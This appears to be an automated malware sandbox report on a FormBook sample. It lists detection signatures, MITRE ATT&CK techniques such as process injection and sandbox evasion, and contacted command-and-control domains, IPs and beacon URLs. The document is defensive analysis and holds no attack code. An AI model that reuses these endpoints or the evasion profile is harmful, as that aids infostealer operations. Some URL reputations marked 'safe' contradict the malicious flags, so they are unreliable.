          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404135 Sample: g1EhgmCqCD.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 31 www.2000deal.com 2->31 33 www.mollysmulligan.com 2->33 35 2000deal.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 6 other signatures 2->49 11 g1EhgmCqCD.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\g1EhgmCqCD.exe.log, ASCII 11->29 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 g1EhgmCqCD.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.anygivenrunday.com 172.247.179.61, 49768, 80 CNSERVERSUS United States 18->37 39 timbraunmusician.com 107.180.51.23, 49767, 80 AS-26496-GO-DADDY-COM-LLCUS United States 18->39 41 15 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          g1EhgmCqCD.exe19%VirustotalBrowse
          g1EhgmCqCD.exe26%ReversingLabs
          g1EhgmCqCD.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.g1EhgmCqCD.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.timbraunmusician.com/8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com$d0%Avira URL Cloudsafe
          http://www.effectivemarketinginc.com/8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnH0%Avira URL Cloudsafe
          http://www.fontbureau.comiona0%URL Reputationsafe
          http://www.fontbureau.comiona0%URL Reputationsafe
          http://www.fontbureau.comiona0%URL Reputationsafe
          http://www.palomachurch.com/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.kayandbernard.com/8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.sandoll.co.krcom0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnr0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.churchsw.org/church-projector-project0%Avira URL Cloudsafe
          http://www.goodfont.co.krn0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.2000deal.com/8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.comI0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/80%Avira URL Cloudsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comnic0%Avira URL Cloudsafe
          http://www.churchsw.org/repository/Bibles/0%Avira URL Cloudsafe
          http://www.carterandcone.comu0%Avira URL Cloudsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          www.cats16.com/8u3b/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.gb-contracting.com/8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          https://mollysmulligan.com/8u3b/?DzrXY=Q160%Avira URL Cloudsafe
          http://www.anygivenrunday.com/8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn60%Avira URL Cloudsafe
          http://www.carterandcone.comfr0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.sandoll.co.krn-u0%Avira URL Cloudsafe
          http://www.goodfont.co.kr-0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnKr40%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          kayandbernard.com
          		184.168.131.241
          		truetrue
            		unknown
            palomachurch.com
            		184.168.131.241
            		truetrue
              		unknown
              timbraunmusician.com
              		107.180.51.23
              		truetrue
                		unknown
                parkingpage.namecheap.com
                		198.54.117.216
                		truefalse
                  		high
                  2000deal.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    gb-contracting.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      effectivemarketinginc.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        www.anygivenrunday.com
                        		172.247.179.61
                        		truetrue
                          		unknown
                          www.mollysmulligan.com
                          		3.13.31.214
                          		truefalse
                            		unknown
                            www.2000deal.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.kayandbernard.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.cats16.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.gb-contracting.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.fnatic-skins.club
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.benleefoto.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.effectivemarketinginc.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.donelys.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.timbraunmusician.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.palomachurch.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.web-evo.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9Ptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.timbraunmusician.com/8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9Ptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.effectivemarketinginc.com/8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9Pfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
